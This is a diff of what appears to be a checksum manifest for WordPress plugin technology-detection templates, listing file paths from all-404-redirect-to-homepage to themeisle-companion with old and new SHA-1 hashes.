+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391 +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015 +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 